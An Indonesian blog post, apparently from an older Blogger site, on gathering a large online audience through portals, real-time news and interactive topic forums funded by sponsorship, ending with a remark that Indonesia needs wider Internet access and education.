Bagaimana cara mengumpulkan massa di Internet? Ada banyak cara mengumpulkan massa di Internet. Sebelum itu kita perlu menyimaki keistimewaan internet - yang sangat berbeda dengan media massa / media elektronik lainnya - internet memungkinkan interaksi yang dua arah dan dapat di customize sesuai dengan masing-masing orang. Koran, TV, media massa sifatnya lebih satu arah dan sukar sekali di customize untuk masing-masing pembaca. Nah seni-nya adalah bagaimana caranya kita mengeksplotasi kelebihan Internet yang sifatnya interaktif dua arah dan customize ini untuk mengumpulkan massa yang sebesar-besarnya.
Langkah yang konvensional adalah membuat protal (atau sederhananya pusat informasi) seperti Yahoo sehingga orang berkumpul. Langkah lain adalah mengeksploitasi kemampuan "real-time" internet dengan cara menyajikan berita-berita secepat mungkin hal ini dilakukan oleh kantor berita / surat kabar seperti CNN, detik.com. Tapi semua masih bersifat satu arah hanya mungkin bisa ditambah kemampuan customize.
Bayangkan kalau di tempat orang memperoleh berita / portal tersebut diberikan fasilitas diskusi yang sifatnya interaktif dan dibuat sekat-sekat untuk bidang / isu-isu tertentu … kira-kira seperti talk-show di TV / radio tapi ini di Internet. Tentunya akan lebih menarik lagi karena orang-orang yang tertarik dibidang / isu tertentu tersebut akan berkumpul setiap hari di situ .. hal ini akan menjadi kesempatan emas bagi penyedia layanan informasi / forum diskusi ini untuk menghasilkan devisa dari sponsorship dll.
Dengan cara-cara psikologi massa yang memanfaatkan semaksimal mungkin keuntungan internet yang sifatnya "real-time" dan "interaktif" maka massa dapat dikumpulkan dengan mudah sehingga dapat terjadi proses cross subsidi yang pada akhirnya dapat menguntungkan semua pihak … terutama pihak pengguna internet yang dapat memperoleh sebagian besar informasi yang dibutuhkan secara gratisan.
Tentunya khusus untuk Indonesia, rumusan di atas hanya berlaku jika jumlah pengguna internet yang ada cukup besar. Pendidikan & akses internet bagi pendidikan akan menjadi salah satu kunci yang paling menentukan dari semuanya. 

 
Design by Wordpress Themes | Bloggerized by Free Blogger Templates | Macys Printable Coupons